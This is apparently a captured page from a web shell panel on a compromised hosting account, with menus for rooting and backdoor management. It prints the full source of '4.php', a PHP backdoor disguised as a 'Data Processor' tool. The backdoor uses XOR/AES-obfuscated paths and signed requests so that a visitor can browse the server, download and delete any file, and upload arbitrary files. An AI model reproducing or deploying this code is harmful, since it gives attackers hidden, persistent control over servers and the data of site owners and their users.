Linux premium242.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
Server IP : 66.29.146.154 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : tukiwyzk
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
tukiwyzk /
wallet.tokenbd.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2025-10-17 07:59
4.php
7.95
KB
-rw-r--r--
2025-08-10 22:52
debug.log
174
B
-rw-r--r--
2025-10-16 00:05
Save
Rename
<?php // Initialize error reporting (disabled for production) ini_set('display_errors', 0); ini_set('display_startup_errors', 0); error_reporting(E_ALL); // Log errors to a file for debugging ini_set('log_errors', 1); ini_set('error_log', __DIR__ . '/debug.log'); // Check for required extensions if (!extension_loaded('openssl')) { error_log('OpenSSL extension missing'); http_response_code(500); exit('<h1>⚠️ System Error</h1>'); } // Start session for data persistence session_name('d4t4pr0c'); if (!session_start()) { error_log('Session start failed'); http_response_code(500); exit('<h1>⚠️ System Error</h1>'); } // Generate dynamic token $token = 'x12y34z56'; // Change to a strong, unique secret $hash = $_SESSION['t0k3n'] ?? bin2hex(openssl_random_pseudo_bytes(16)); // Fallback to openssl $_SESSION['t0k3n'] = $hash; $proc_key = hash('sha256', $token . $hash); // Data transformation function function transform($input, $key) { $result = ''; for ($i = 0; $i < strlen($input); $i++) { $result .= chr(ord($input[$i]) ^ ord($key[$i % strlen($key)])); } return base64_encode($result); } // Reverse transformation function function reverse_transform($input, $key) { $input = base64_decode($input, true); if ($input === false) { error_log('Invalid base64 input in reverse_transform'); return false; } $result = ''; for ($i = 0; $i < strlen($input); $i++) { $result .= chr(ord($input[$i]) ^ ord($key[$i % strlen($key)])); } return $result; } // Secure data processing function proc_data($input, $key) { if (!is_string($input) || empty($input)) { error_log('Invalid input in proc_data'); return false; } $vector = openssl_random_pseudo_bytes(openssl_cipher_iv_length('aes-256-cbc')); $processed = openssl_encrypt(transform($input, $key), 'aes-256-cbc', $key, 0, $vector); if ($processed === false) { error_log('Encryption failed in proc_data'); return false; } return base64_encode($processed . '::' . base64_encode($vector)); } // Reverse data processing function unproc_data($input, $key) { $input = base64_decode($input, true); if ($input === false) { error_log('Invalid base64 input in unproc_data'); return false; } $segments = explode('::', $input); if (count($segments) !== 2) { error_log('Invalid segment count in unproc_data'); return false; } $vector = base64_decode($segments[1], true); if ($vector === false) { error_log('Invalid vector in unproc_data'); return false; } $unprocessed = openssl_decrypt($segments[0], 'aes-256-cbc', $key, 0, $vector); if ($unprocessed === false) { error_log('Decryption failed in unproc_data'); return false; } return reverse_transform($unprocessed, $key); } // Sign request parameters function sign_request($params, $key) { ksort($params); $query = http_build_query($params); $signature = hash_hmac('sha256', $query, $key); $params['sig'] = $signature; return '?' . http_build_query($params); } // Verify request signature function verify_request($params, $key) { if (!isset($params['sig'])) { error_log('Missing signature in verify_request'); return false; } $signature = $params['sig']; unset($params['sig']); ksort($params); $query = http_build_query($params); return hash_equals($signature, hash_hmac('sha256', $query, $key)); } // Current context path (start at specified server path or fallback) $default_path = '/home/u232724578/websites/OUmiGmO41/public_html'; $fallback_path = getcwd(); // Fallback to current directory $ctx = isset($_GET['p']) ? unproc_data($_GET['p'], $proc_key) : $default_path; // Validate path if ($ctx === false || !file_exists($ctx) || !is_readable($ctx)) { error_log('Invalid or inaccessible context path: ' . ($ctx ?: 'null') . '. Attempting fallback path: ' . $fallback_path); $ctx = $fallback_path; if (!file_exists($ctx) || !is_readable($ctx)) { error_log('Fallback path invalid or inaccessible: ' . $ctx); http_response_code(400); exit('<h1>⚠️ Invalid Path</h1>'); } } $ctx = realpath($ctx); // Add parent directory link if not at root $parent_path = dirname($ctx); $show_parent = ($ctx !== '/' && file_exists($parent_path) && is_readable($parent_path)); // Remove resource if (isset($_GET['rm']) && verify_request($_GET, $proc_key)) { $res = unproc_data($_GET['rm'], $proc_key); if ($res && file_exists($res) && is_writable($res)) { if (is_dir($res)) { // Check if directory is empty $files = array_diff(scandir($res), ['.', '..']); if (empty($files)) { rmdir($res); } else { error_log('Directory not empty: ' . $res); } } else { unlink($res); } header("Location: " . sign_request(['p' => proc_data($ctx, $proc_key)], $proc_key)); exit; } else { error_log('Failed to remove resource: ' . ($res ?: 'null')); } } // Retrieve resource if (isset($_GET['rt']) && verify_request($_GET, $proc_key)) { $res = unproc_data($_GET['rt'], $proc_key); if ($res && file_exists($res) && is_readable($res)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($res) . '"'); readfile($res); exit; } else { error_log('Failed to retrieve resource: ' . ($res ?: 'null')); } } // Handle data submission if (isset($_FILES['data']) && $_FILES['data']['error'] === UPLOAD_ERR_OK) { $upload_path = $ctx . '/' . basename($_FILES['data']['name']); if (is_writable($ctx) && move_uploaded_file($_FILES['data']['tmp_name'], $upload_path)) { header("Location: " . sign_request(['p' => proc_data($ctx, $proc_key)], $proc_key)); exit; } else { error_log('Failed to upload file to: ' . $upload_path); } } // Render interface echo "<!DOCTYPE html><html><head><meta charset='UTF-8'><title>Data Processor</title> <style> body { background: #f4f4f4; color: #333; font-family: Arial, sans-serif; padding: 20px; } a { color: #007bff; text-decoration: none; } a:hover { text-decoration: underline; } .container { max-width: 800px; margin: 0 auto; } .list-item { padding: 5px 0; } </style></head><body><div class='container'>"; echo "<h1>📊 Data Processor</h1>"; echo "<p>Current Path: <code>" . htmlspecialchars($ctx) . "</code></p>"; // Show parent directory link if ($show_parent) { $parent_link = sign_request(['p' => proc_data($parent_path, $proc_key)], $proc_key); echo "<p><a href='$parent_link'>[Parent Directory]</a></p>"; } echo "<ul>"; $items = @scandir($ctx); if ($items === false) { error_log('Failed to scan directory: ' . $ctx); http_response_code(500); exit('<h1>⚠️ System Error</h1>'); } foreach ($items as $entry) { if ($entry === '.' || $entry === '..') continue; $path = "$ctx/$entry"; if (!file_exists($path)) continue; if (is_dir($path)) { $link = sign_request(['p' => proc_data($path, $proc_key)], $proc_key); echo "<li class='list-item'>[Folder] <a href='$link'>" . htmlspecialchars($entry) . "</a></li>"; } else { $ret = sign_request(['rt' => proc_data($path, $proc_key)], $proc_key); $rm = sign_request(['rm' => proc_data($path, $proc_key)], $proc_key); echo "<li class='list-item'>" . htmlspecialchars($entry) . " - <a href='$ret'>Download</a> | <a href='$rm' style='color:#dc3545'>Delete</a></li>"; } } echo "</ul>"; echo "<form method='POST' enctype='multipart/form-data'> <input type='file' name='data'><input type='submit' value='Upload Data'> </form>"; echo "</div></body></html>"; ?>